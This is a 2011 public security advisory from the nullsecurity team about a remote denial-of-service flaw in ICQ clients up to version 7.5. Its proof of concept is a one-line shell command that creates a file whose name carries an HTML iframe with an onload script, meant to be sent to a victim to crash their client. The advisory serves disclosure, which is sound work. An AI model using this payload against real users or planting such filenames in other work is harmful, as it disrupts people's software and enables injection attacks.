===============================================================================
|                                                                             |
          ~    .__ °.__   0       o                    ^   .__ °__  `´
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__.
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  |
  | o°|  \  |  /  |_|  |__\___ \\  ___/\ °\___| o|  /|  | \/  ||  |° \___ O|
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____|
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´

                          PUBLIC SECURITY ADVISORY
|                                                                             |
===============================================================================                  


~|Title|: 

ICQ -Remote Denial of Service Vulnerability (MUIMessage.dll)


~|Author|:

noptrix


~|Date|:

07-28-2011


~|Vendor|:

ICQ - http://www.icq.com/


~|Affected Product|:

ICQ Client in version <= 7.5


~|Affected Platforms|:

Windows (XP, Vista, 7)


~|Vulnerability Class|:

Denial of Service (remote)


~|Description|:

ICQ suffers from a remote Denial of Service vulnerability due to a lack of input
validation, output sanitization, wrong filetype and filename handling over file
transfers.


~|Proof of Concept (or Exploit)|:

The following file and payload can be used to trigger the described
vulnerability (send to victim as file):

--- SNIP ---

sh3ll$ echo "0" > \<iframe src\=\"icq.com\"\ onload\=alert\('0x90'\)\>.rtf

--- SNIP ---

Now, an attacker only needs to send this file to the victim. It will crash the
ICQ client of the victim whenever the attacker cancels the filetransfer.
Afterwards whenever the victim is trying to send a message to the attacker, it
will crash after a few seconds...
So this could be a "Cross-Site Scripting leading to Denial of Service"? :)

For a PoC demonstration see:

    [+] http://www.youtube.com/watch?v=7I1JNUWLeec


~|Impact|:

An attacker could trivially crash ICQ clients of remote users without victims
interaction.


~|Threat Level|:

Medium


~|Status|:

Fixed.


~|Disclaimer|:

nullsecurity.net hereby emphasize, that the information which is published here are
for education purposes only. nullsecurity.net does not take any responsibility for
any abuse or misusage!

                Copyright (c) 2011 - nullsecurity.net